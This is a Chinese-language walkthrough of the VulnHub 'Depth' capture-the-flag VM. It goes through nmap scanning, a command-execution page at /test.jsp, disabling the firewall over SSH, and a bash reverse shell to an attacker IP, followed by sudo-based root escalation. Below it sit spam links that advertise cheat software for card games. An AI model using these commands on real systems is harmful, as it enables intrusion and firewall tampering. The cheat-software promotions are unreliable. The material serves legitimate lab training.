【vulnhub】Depth靶机
创始人
2024-11-13 03:41:18
0

靶机安装

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

运行环境:VMware运行该虚拟机

信息收集

靶机IP发现

nmap 192.168.93.0/24

端口扫描

nmap -A 192.168.93.154 -p-

只开起了8080端口

进行目录扫描8080端口

dirsearch -u http://192.168.93.154:8080

有一个目录/test.jsp

IP网址访问

翻译过后为

后面拼接/test.jsp

翻译过后

提示我们输入 ls -l /tmp 测试一下

存在系统命令执行漏洞,进行利用,反弹shell尝试失败

漏洞利用

ls -l /home 查看到home目录内容,发现bill用户

输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。

尝试关闭防火墙

#尝试关闭防火墙 ssh bill@localhost sudo ufw disable

再次执行反弹shell

ssh bill@localhost bash -i >& /dev/tcp/192.168.93.130/8787 0>&1

获取shell成功

提权

尝试sudo提权

sudo -l,发现所有用户(ALL)都有sudo权限,

直接 sudo su 命令

查看flag文件

上一篇:鸿蒙(HarmonyOS)项目方舟框架(ArkUI)之RichText组件

下一篇:两分钟了解!wpk透视软件网站(透视)wepoker确实有挂(有挂指点)

相关内容

热门资讯

8分钟解迷!微信小程序开发(辅... 8分钟解迷!微信小程序开发(辅助挂)本来真的是有挂,新版2025教程(有挂教程)-哔哩哔哩1)微信小...
第4分钟曝光!邳州友友辅助软件... 第4分钟曝光!邳州友友辅助软件下载安卓(辅助挂)确实是真的挂,教你攻略(有挂解密)-哔哩哔哩邳州友友...
7分钟普及!福建天天开心王国辅... 7分钟普及!福建天天开心王国辅助(辅助挂)好像是真的挂,必胜教程(有挂总结)-哔哩哔哩1、游戏颠覆性...
九分钟普及!赣牌圈控制牌型辅助... 九分钟普及!赣牌圈控制牌型辅助器(辅助挂)果然有挂,解说技巧(有挂分享)-哔哩哔哩一、赣牌圈控制牌型...
第2分钟必备!博雅西元红河辅助... 第2分钟必备!博雅西元红河辅助脚本(辅助挂)竟然真的有挂,规律教程(有挂秘笈)-哔哩哔哩1、进入游戏...
最新消息!拱趴大菠萝挂(辅助挂... 最新消息!拱趴大菠萝挂(辅助挂)其实是有挂(通报开挂辅助安装)-哔哩哔哩1、拱趴大菠萝挂ai机器人多...
据悉!好友赣南能装挂吗(辅助挂... 据悉!好友赣南能装挂吗(辅助挂)一直有挂(教会开挂辅助工具)-哔哩哔哩好友赣南能装挂吗辅助器中分为三...
于此同时!葫芦娃七子连心攻略(... 于此同时!葫芦娃七子连心攻略(辅助挂)一贯真的有挂(分享开挂辅助插件)-哔哩哔哩1、起透看视 葫芦娃...
有玩家发现!财神十三张辅助(辅... 有玩家发现!财神十三张辅助(辅助挂)果然有挂(分享开挂辅助神器)-哔哩哔哩1、进入游戏-大厅左侧-新...
今年以来!好友赣南新版本辅助(... 今年以来!好友赣南新版本辅助(辅助挂)一贯确实有挂(传授开挂辅助神器)-哔哩哔哩;1、下载好好友赣南...